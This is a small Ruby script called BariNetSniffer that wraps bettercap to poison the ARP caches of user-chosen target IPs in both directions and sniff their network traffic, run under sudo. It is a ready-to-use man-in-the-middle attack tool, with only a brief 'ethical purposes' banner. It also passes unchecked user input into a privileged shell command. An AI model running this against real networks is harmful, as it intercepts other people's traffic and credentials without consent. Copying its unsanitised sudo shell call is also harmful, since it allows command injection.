#!/usr/bin/ruby

def script(interface_name, targets)
	script = "net.probe on;"
	script += "set arp.spoof.fullduplex true;"
	script += "set arp.spoof.targets #{targets};"
	script += "arp.spoof on;"
	script += "net.sniff on"
	system "sudo bettercap -silent -iface #{interface_name} -eval \"#{script}\""
end

def interactive
	print "Enter interface name: "
	interf_name = gets.chomp
	
	print "Enter targets IPs (separated with commas): "
	targets = gets.chomp
	
	script interf_name, targets
end

system("sudo print")

if not system("bettercap -version > /dev/null") then
	puts "Bettercap v2.32 is required . .\nPlease install it and try again."
	exit
end

if ["-h", "--help", "-help", "help"].include? ARGV[0]  then
	puts "netsniffer (for interactive shell)\n" +
		 "netsniffer <interface-name> <targets (separated by commas)>"
else
	puts "---------------------\n" + 
		" BariNetSniffer v1.0\n" +
		" Developed by: BariBGF\n" +
		" Based on `bettercap v2.32`\n" +
		" For security and ethical purposes only!\n" +
		" Exit by `ctrl + c`\n" +
		"--------------------\n" +
		"\n"
		
	if ARGV[0] != nil and ARGV[1] != nil then
		script ARGV[0], ARGV[1]
	else
		interactive
	end
end
